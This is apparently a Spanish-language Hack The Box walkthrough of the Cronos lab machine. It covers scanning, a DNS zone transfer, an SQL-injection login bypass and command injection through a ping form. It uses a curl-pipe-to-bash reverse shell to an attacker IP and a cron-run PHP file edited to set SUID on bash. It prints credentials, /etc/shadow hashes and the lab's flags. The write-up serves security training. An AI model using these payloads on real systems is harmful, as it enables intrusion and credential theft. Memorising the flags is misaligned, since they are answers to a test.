Cronos - Hack The Box

⮕ Maquina Linux

❯ ping -c 1 10.10.10.13
PING 10.10.10.13 (10.10.10.13) 56(84) bytes of data.
64 bytes from 10.10.10.13: icmp_seq=1 ttl=63 time=92.0 ms

--- 10.10.10.13 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 91.957/91.957/91.957/0.000 ms
❯ whichSystem.py 10.10.10.13

10.10.10.13 (ttl -> 63): Linux

PortScan

En esta ocasión vamos a usar una pequeña herramienta que cree para automatizar el escaneo de Nmap

nrunscan

❯ ./nrunscan.sh -i
 Give me the IP target: 10.10.10.13

Starting the scan with nmap
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-25 13:48 CST
Initiating SYN Stealth Scan at 13:48
Scanning 10.10.10.13 [65535 ports]
Discovered open port 22/tcp on 10.10.10.13
Discovered open port 53/tcp on 10.10.10.13
Discovered open port 80/tcp on 10.10.10.13
Completed SYN Stealth Scan at 13:48, 19.07s elapsed (65535 total ports)
Nmap scan report for 10.10.10.13
Host is up, received user-set (0.095s latency).
Scanned at 2023-06-25 13:48:02 CST for 19s
Not shown: 62132 closed tcp ports (reset), 3400 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
53/tcp open  domain  syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 19.20 seconds
           Raw packets sent: 94395 (4.153MB) | Rcvd: 75149 (3.006MB)

[*] Extracting information...

	[*] IP Target: 10.10.10.13
	[*] Open Ports:  22,53,80

[*] Ports copied to clipboard


Escaning the services and technologies in the ports
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-25 13:48 CST
Nmap scan report for 10.10.10.13
Host is up (0.12s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18b973826f26c7788f1b3988d802cee8 (RSA)
|   256 1ae606a6050bbb4192b028bf7fe5963b (ECDSA)
|_  256 1a0ee7ba00cc020104cda3a93f5e2220 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.28 seconds
[*] Port 80 or 8080 is open

 Do you want to run the http-enum script of nmap (Y/N)?: N

Thanks for using the script! Happy Hacking

Enumeracion

Estas son las tecnologías que están corriendo en el puerto 80

 whatweb http://10.10.10.13
http://10.10.10.13 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.10.13], Title[Apache2 Ubuntu Default Page: It works]

Vemos la pagina por defecto de Apache2

Vamos aplicar Fuzzing para descubrir nuevas rutas

❯ gobuster dir -u http://10.10.10.13 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 80
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.13
[+] Method:                  GET
[+] Threads:                 80
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/06/25 13:53:16 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 299]
                                               
===============================================================
2023/06/25 13:58:48 Finished
===============================================================

Como tal no tenemos capacidad de lectura en esa ruta ya que el código de estado es 403

❯ curl -s http://10.10.10.13/server-status
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /server-status
on this server.<br />
</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 10.10.10.13 Port 80</address>
</body></html>

Otra cosa que podemos hacer es básicamente hacer Fuzzing pero ahora para ver si encontramos algún subdominio

❯ gobuster vhost -u http://10.10.10.13/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://10.10.10.13/
[+] Method:       GET
[+] Threads:      50
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2023/06/25 14:01:02 Starting gobuster in VHOST enumeration mode
===============================================================
                              
===============================================================
2023/06/25 14:01:17 Finished
===============================================================

Como no encontramos nada podemos seguir enumerando el siguiente puerto que es el 53

Domain Zone transfer

Para hacer esto primero necesitamos saber el dominio podemos usar la herramienta nslookup para saberlo y vemos que si funciona con esto podemos saber que también cronos.htb funciona

❯ nslookup
> server 10.10.10.13
Default server: 10.10.10.13
Address: 10.10.10.13#53
> 10.10.10.13
;; communications error to 10.10.10.13#53: timed out
13.10.10.10.in-addr.arpa	name = ns1.cronos.htb.
> 

Vamos agregarlo al /etc/hosts

echo "10.10.10.13 ns1.cronos.htb" | sudo tee -a /etc/hosts
10.10.10.13 ns1.cronos.htb
❯ ping -c 1 ns1.cronos.htb
PING ns1.cronos.htb (10.10.10.13) 56(84) bytes of data.
64 bytes from ns1.cronos.htb (10.10.10.13): icmp_seq=1 ttl=63 time=117 ms

--- ns1.cronos.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 117.055/117.055/117.055/0.000 ms

El Domain Zone Transfer nos permite obtener múltiples subdominios asociados al dominio para poder seguir enumerando Pentesting DNS

Usaremos la siguiente herramienta para poder hacerlo

❯ dig -h
Usage:  dig [@global-server] [domain] [q-type] [q-class] {q-opt}
            {global-d-opt} host [@local-server] {local-d-opt}
            [ host [@local-server] {local-d-opt} [...]]
Where:  domain	 is in the Domain Name System
        q-class  is one of (in,hs,ch,...) [default: in]
        q-type   is one of (a,any,mx,ns,soa,hinfo,axfr,txt,...) [default:a]
                 (Use ixfr=version for type ixfr)
        q-opt    is one of:
                 -4                  (use IPv4 query transport only)
                 -6                  (use IPv6 query transport only)
                 -b address[#port]   (bind to source address/port)
                 -c class            (specify query class)
                 -f filename         (batch mode)
                 -k keyfile          (specify tsig key file)
                 -m                  (enable memory usage debugging)
                 -p port             (specify port number)
                 -q name             (specify query name)
                 -r                  (do not read ~/.digrc)
                 -t type             (specify query type)
                 -u                  (display times in usec instead of msec)
                 -x dot-notation     (shortcut for reverse lookups)
                 -y [hmac:]name:key  (specify named base64 tsig key)
        d-opt    is of the form +keyword[=value], where keyword is:
                 +[no]aaflag         (Set AA flag in query (+[no]aaflag))
                 +[no]aaonly         (Set AA flag in query (+[no]aaflag))
                 +[no]additional     (Control display of additional section)
                 +[no]adflag         (Set AD flag in query (default on))
                 +[no]all            (Set or clear all display flags)
                 +[no]answer         (Control display of answer section)
                 +[no]authority      (Control display of authority section)
                 +[no]badcookie      (Retry BADCOOKIE responses)
                 +[no]besteffort     (Try to parse even illegal messages)
                 +bufsize[=###]      (Set EDNS0 Max UDP packet size)
                 +[no]cdflag         (Set checking disabled flag in query)
                 +[no]class          (Control display of class in records)
                 +[no]cmd            (Control display of command line -
                                      global option)
                 +[no]comments       (Control display of packet header
                                      and section name comments)
                 +[no]cookie         (Add a COOKIE option to the request)
                 +[no]crypto         (Control display of cryptographic
                                      fields in records)
                 +[no]defname        (Use search list (+[no]search))
                 +[no]dns64prefix    (Get the DNS64 prefixes from ipv4only.arpa)
                 +[no]dnssec         (Request DNSSEC records)
                 +domain=###         (Set default domainname)
                 +[no]edns[=###]     (Set EDNS version) [0]
                 +ednsflags=###      (Set EDNS flag bits)
                 +[no]ednsnegotiation (Set EDNS version negotiation)
                 +ednsopt=###[:value] (Send specified EDNS option)
                 +noednsopt          (Clear list of +ednsopt options)
                 +[no]expandaaaa     (Expand AAAA records)
                 +[no]expire         (Request time to expire)
                 +[no]fail           (Don't try next server on SERVFAIL)
                 +[no]header-only    (Send query without a question section)
                 +[no]https[=###]    (DNS-over-HTTPS mode) [/]
                 +[no]https-get      (Use GET instead of default POST method while using HTTPS)
                 +[no]http-plain[=###]    (DNS over plain HTTP mode) [/]
                 +[no]https-plain-get      (Use GET instead of default POST method while using plain HTTP)
                 +[no]identify       (ID responders in short answers)
                 +[no]idnin          (Parse IDN names [default=on on tty])
                 +[no]idnout         (Convert IDN response [default=on on tty])
                 +[no]ignore         (Don't revert to TCP for TC responses.)
                 +[no]keepalive      (Request EDNS TCP keepalive)
                 +[no]keepopen       (Keep the TCP socket open between queries)
                 +[no]multiline      (Print records in an expanded format)
                 +ndots=###          (Set search NDOTS value)
                 +[no]nsid           (Request Name Server ID)
                 +[no]nssearch       (Search all authoritative nameservers)
                 +[no]onesoa         (AXFR prints only one soa record)
                 +[no]opcode=###     (Set the opcode of the request)
                 +padding=###        (Set padding block size [0])
                 +qid=###            (Specify the query ID to use when sending queries)
                 +[no]qr             (Print question before sending)
                 +[no]question       (Control display of question section)
                 +[no]raflag         (Set RA flag in query (+[no]raflag))
                 +[no]rdflag         (Recursive mode (+[no]recurse))
                 +[no]recurse        (Recursive mode (+[no]rdflag))
                 +retry=###          (Set number of UDP retries) [2]
                 +[no]rrcomments     (Control display of per-record comments)
                 +[no]search         (Set whether to use searchlist)
                 +[no]short          (Display nothing except short
                                      form of answers - global option)
                 +[no]showbadcookie  (Show BADCOOKIE message)
                 +[no]showsearch     (Search with intermediate results)
                 +[no]split=##       (Split hex/base64 fields into chunks)
                 +[no]stats          (Control display of statistics)
                 +subnet=addr        (Set edns-client-subnet option)
                 +[no]tcflag         (Set TC flag in query (+[no]tcflag))
                 +[no]tcp            (TCP mode (+[no]vc))
                 +timeout=###        (Set query timeout) [5]
                 +[no]tls            (DNS-over-TLS mode)
                 +[no]tls-ca[=file]  (Enable remote server's TLS certificate validation)
                 +[no]tls-hostname=hostname (Explicitly set the expected TLS hostname)
                 +[no]tls-certfile=file (Load client TLS certificate chain from file)
                 +[no]tls-keyfile=file (Load client TLS private key from file)
                 +[no]trace          (Trace delegation down from root [+dnssec])
                 +tries=###          (Set number of UDP attempts) [3]
                 +[no]ttlid          (Control display of ttls in records)
                 +[no]ttlunits       (Display TTLs in human-readable units)
                 +[no]unknownformat  (Print RDATA in RFC 3597 "unknown" format)
                 +[no]vc             (TCP mode (+[no]tcp))
                 +[no]yaml           (Present the results as YAML)
                 +[no]zflag          (Set Z flag in query)
        global d-opts and servers (before host name) affect all queries.
        local d-opts and servers (after host name) affect only that lookup.
        -h                           (print help and exit)
        -v                           (print version and exit)

Vemos estos subdominios nuevos

❯ dig @10.10.10.13 cronos.htb axfr

; <<>> DiG 9.18.12-1~bpo11+1-Debian <<>> @10.10.10.13 cronos.htb axfr
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 96 msec
;; SERVER: 10.10.10.13#53(10.10.10.13) (TCP)
;; WHEN: Sun Jun 25 14:17:12 CST 2023
;; XFR size: 7 records (messages 1, bytes 203)

Vamos agregar los nuevos subdominios al /etc/hosts

cat /etc/hosts | tail -n 1
10.10.10.13 ns1.cronos.htb cronos.htb admin.cronos.htb www.cronos.htb
❯ ping -c 1 admin.cronos.htb
PING ns1.cronos.htb (10.10.10.13) 56(84) bytes of data.
64 bytes from ns1.cronos.htb (10.10.10.13): icmp_seq=1 ttl=63 time=94.0 ms

--- ns1.cronos.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 94.038/94.038/94.038/0.000 ms
❯ ping -c 1 www.cronos.htb
PING ns1.cronos.htb (10.10.10.13) 56(84) bytes of data.
64 bytes from ns1.cronos.htb (10.10.10.13): icmp_seq=1 ttl=63 time=94.6 ms

--- ns1.cronos.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 94.566/94.566/94.566/0.000 ms

Ahora teniendo los subdominios podemos seguir enumerando

Subdomains Enumeration

Vemos un panel de Login en el subdominio admin.cronos.htb

Y en el subdominio www.cronos.htb vemos esto lo cual no es interesante

Vamos aplicar Fuzzing para ver si encontramos algo en el subdominio admin.cronos.htb pero nada interesante

❯ feroxbuster -u http://admin.cronos.htb

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.3.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://admin.cronos.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.3.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403       11l       32w      304c http://admin.cronos.htb/server-status
[####################] - 1m     29999/29999   0s      found:1       errors:0      
[####################] - 1m     29999/29999   377/s   http://admin.cronos.htb

Por ultimo vamos a aplicar lo mismo pero para el otro subdominio si no encontramos nada vamos a tener que interactuar con el panel de login

❯ feroxbuster -u http://www.cronos.htb

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.3.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://www.cronos.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.3.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301        9l       28w      314c http://www.cronos.htb/css
301        9l       28w      313c http://www.cronos.htb/js
403       11l       32w      302c http://www.cronos.htb/server-status
[####################] - 1m     89997/89997   0s      found:3       errors:1      
[####################] - 1m     29999/29999   409/s   http://www.cronos.htb
[####################] - 1m     29999/29999   414/s   http://www.cronos.htb/css
[####################] - 1m     29999/29999   416/s   http://www.cronos.htb/js

SQLI Bypass Login

Pues bueno no encontramos nada así que vamos a tener que seguir con el panel de login que vimos en el subdominio admin.cronos.htb

Si probamos con admin:admin vemos que no nos deja

Si probamos con un ’ or 1=1– - y le damos a submit vemos que nos deja conectarnos

Bueno ahora vemos que podemos hacer un traceroute o un ping a una IP lo que podemos hacer es ponernos en escucha con tcpdump para ver si nos llega alguna traza

❯ tcpdump -i tun0 icmp -n
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

Vemos que se hizo

Y nos llega

❯ tcpdump -i tun0 icmp -n
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
15:25:53.511249 IP 10.10.10.13 > 10.10.14.12: ICMP echo request, id 2859, seq 1, length 64
15:25:53.511313 IP 10.10.14.12 > 10.10.10.13: ICMP echo reply, id 2859, seq 1, length 64

Si esto no esta bien sanitizado podemos concatenar un comando para ver si se puede ejecutar

Shell as www-data

Como podemos ejecutar comandos vamos a ver si la maquina tiene curl para ver si de esta forma podemos ganar acceso ala maquina

❯ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Como podemos ejecutar curl podemos hacer que haga una petición a un recurso que vamos a estar ofreciendo mediante nuestro servidor http con Python3 y nos llegue la shell

❯ catn index.html
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.12/443 0>&1

Ahora nos podemos en escucha por el puerto 443 o el que tu quieras

❯ nc -nlvp 443
listening on [any] 443 ...

Y podemos el servidor

❯ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Ahora ejecutamos esto 10.10.14.12; curl 10.10.14.12 | bash en la parte del input y al darle a execute nos llega la reverse shell

Ahora haremos un tratamiento de la tty

❯ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.13] 55354
bash: cannot set terminal process group (1316): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
www-data@cronos:/var/www/admin$ ^Z
zsh: suspended  nc -nlvp 443
❯ stty raw -echo; fg
[1]  + continued  nc -nlvp 443
                              reset xterm
ENTER
www-data@cronos:/var/www/admin$ export TERM=xterm

User.txt

Podemos ver la flag

www-data@cronos:/home$ cd noulis/
www-data@cronos:/home/noulis$ ls
user.txt
www-data@cronos:/home/noulis$ cat user.txt 
61a7c302aadebca30bea49c3fa34b259
www-data@cronos:/home/noulis$ 

Escalada de privilegios

mysql connect

En esta ruta vemos las credenciales de la base de datos

www-data@cronos:/home/noulis$ cd /var/www/admin/
www-data@cronos:/var/www/admin$ ls
config.php  index.php  logout.php  session.php	welcome.php
www-data@cronos:/var/www/admin$ cat config.php 
<?php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
www-data@cronos:/var/www/admin$ 

Vemos que nos podemos conectar ala base de datos admin

www-data@cronos:/var/www/admin$ mysql -u admin -pkEjdbRigfBHUREiNSDs admin
mysql: [Warning] Using a password on the command line interface can be insecure.
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 36
Server version: 5.7.17-0ubuntu0.16.04.2 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 

Hay una tabla users

mysql> show tables;
+-----------------+
| Tables_in_admin |
+-----------------+
| users           |
+-----------------+
1 row in set (0.00 sec)

mysql> 

Vemos la contraseña del admin pero ahora no nos sirve de nada por que al parecer estas credenciales son para loguearnos en el panel de login

mysql> select * from users;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 4f5fffa7b2340178a716e3832451e058 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)

mysql> 

Si buscamos por privilegios SUID encontramos los siguientes pero no usaremos el pkexec

www-data@cronos:/$ find \-perm -4000 2>/dev/null
./bin/ping
./bin/umount
./bin/mount
./bin/fusermount
./bin/su
./bin/ntfs-3g
./bin/ping6
./usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
./usr/lib/snapd/snap-confine
./usr/lib/eject/dmcrypt-get-device
./usr/lib/policykit-1/polkit-agent-helper-1
./usr/lib/openssh/ssh-keysign
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/bin/chsh
./usr/bin/newuidmap
./usr/bin/sudo
./usr/bin/chfn
./usr/bin/newgrp
./usr/bin/at
./usr/bin/pkexec
./usr/bin/newgidmap
./usr/bin/gpasswd
./usr/bin/passwd
www-data@cronos:/$ 

Como tal no podemos reutilizar al contraseña que encontramos en la base de datos

www-data@cronos:/home$ sudo -l
[sudo] password for www-data: 
Sorry, try again.
[sudo] password for www-data: 
sudo: 1 incorrect password attempt
www-data@cronos:/home$ ls
noulis
www-data@cronos:/home$ su noulis
Password: 
su: Authentication failure
www-data@cronos:/home$ 

Vemos que cada minuto root esta ejecutando con php lo que hay en esa ruta

www-data@cronos:/opt$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
www-data@cronos:/opt$  

Y bueno somos propietarios de ese archivo

www-data@cronos:/var/www/admin$ ls -l /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 /var/www/laravel/artisan
www-data@cronos:/var/www/admin$ 

Vamos a meter lo que queramos en PHP

Podemos crearnos también un Script en bash para detectar las tareas que se estén ejecutando

www-data@cronos:/dev/shm$ chmod +x procmon.sh 
www-data@cronos:/dev/shm$ cat procmon.sh 
#!/bin/bash

function ctrl_c(){
	echo -e "\n\n[!]Saliendo....\n"
	tput cnorm; exit 1
}

# CTRL+C
trap ctrl_c INT

old_process="$(ps -eo command)"

tput civis
while true; do
	new_process="$(ps -eo command)"
	diff <(echo "$old_process") <(echo "$new_process") | grep -vE "command|procmon|kworker"
	old_process="$new_process"
done
tput cnorm
www-data@cronos:/dev/shm$ 

Si lo ejecutamos vemos lo que nos interesa

www-data@cronos:/dev/shm$ ./procmon.sh
> /usr/sbin/CRON -f
> /bin/sh -c php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
> php /var/www/laravel/artisan schedule:run
172,174d171
< /usr/sbin/CRON -f
< /bin/sh -c php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
< php /var/www/laravel/artisan schedule:run

Igual si no quieres hacer esto puedes usar pspy

Vamos abrirnos el archivo para indicarle la instrucción que queremos que ejecute en PHP que lo que queremos es que nos asigne el privilegio SUID ala bash

www-data@cronos:/dev/shm$ cat /var/www/laravel/artisan 
#!/usr/bin/env php
<?php
system("chmod u+s /bin/bash");
/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/

require __DIR__.'/bootstrap/autoload.php';

$app = require_once __DIR__.'/bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Artisan Application
|--------------------------------------------------------------------------
|
| When we run the console application, the current CLI command will be
| executed in this console and the response sent back to a terminal
| or another output device for the developers. Here goes nothing!
|
*/

$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);

$status = $kernel->handle(
    $input = new Symfony\Component\Console\Input\ArgvInput,
    new Symfony\Component\Console\Output\ConsoleOutput
);

/*
|--------------------------------------------------------------------------
| Shutdown The Application
|--------------------------------------------------------------------------
|
| Once Artisan has finished running. We will fire off the shutdown events
| so that any final work may be done by the application before we shut
| down the process. This is the last thing to happen to the request.
|
*/

$kernel->terminate($input, $status);

exit($status);
www-data@cronos:/dev/shm$ 

Después de que la tarea se ejecuta vemos que funciona

www-data@cronos:/dev/shm$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1037528 Jun 24  2016 /bin/bash
www-data@cronos:/dev/shm$

Shell as root && root flag

Y ahora somos root

www-data@cronos:/dev/shm$ bash -p
bash-4.3# cd /root
bash-4.3# cat root.txt 
b5cc776e1d79fdac052bf9587cb66462
bash-4.3# 

Estos son los hashes de los usuarios si logras crackearlos podrás ver sus contraseñas en texto claro

bash-4.3# cat /etc/shadow
root:$6$L2m6DJwN$p/xas4tCNp19sda4q2ZzGC82Ix7GiEb7xvCbzWCsFHs/eR82G4/YOnni/.L69tpCkOGo5lm0AU7zh9lP5fL6A0:17247:0:99999:7:::
daemon:*:17212:0:99999:7:::
bin:*:17212:0:99999:7:::
sys:*:17212:0:99999:7:::
sync:*:17212:0:99999:7:::
games:*:17212:0:99999:7:::
man:*:17212:0:99999:7:::
lp:*:17212:0:99999:7:::
mail:*:17212:0:99999:7:::
news:*:17212:0:99999:7:::
uucp:*:17212:0:99999:7:::
proxy:*:17212:0:99999:7:::
www-data:$6$SYixzIan$P3cvyztSwA1lmILF3kpKcqZpYSDONYwMwplB62RWu1RklKqIGCX1zleXuVwzxjLcpU6bhiW9N03AWkzVUZhms.:17264:0:99999:7:::
backup:*:17212:0:99999:7:::
list:*:17212:0:99999:7:::
irc:*:17212:0:99999:7:::
gnats:*:17212:0:99999:7:::
nobody:*:17212:0:99999:7:::
systemd-timesync:*:17212:0:99999:7:::
systemd-network:*:17212:0:99999:7:::
systemd-resolve:*:17212:0:99999:7:::
systemd-bus-proxy:*:17212:0:99999:7:::
syslog:*:17212:0:99999:7:::
_apt:*:17212:0:99999:7:::
lxd:*:17247:0:99999:7:::
mysql:!:17247:0:99999:7:::
messagebus:*:17247:0:99999:7:::
uuidd:*:17247:0:99999:7:::
dnsmasq:*:17247:0:99999:7:::
sshd:*:17247:0:99999:7:::
noulis:$6$ApsLg5.I$Zd9blHPGRHAQOab94HKuQFtJ8m7ob8MFnX6WIIr0Aah6pW/aZ.yA3T1iU13lCSixrh6NG1.GHPl.QbjHSZmg7/:17247:0:99999:7:::
bind:*:17264:0:99999:7:::
bash-4.3#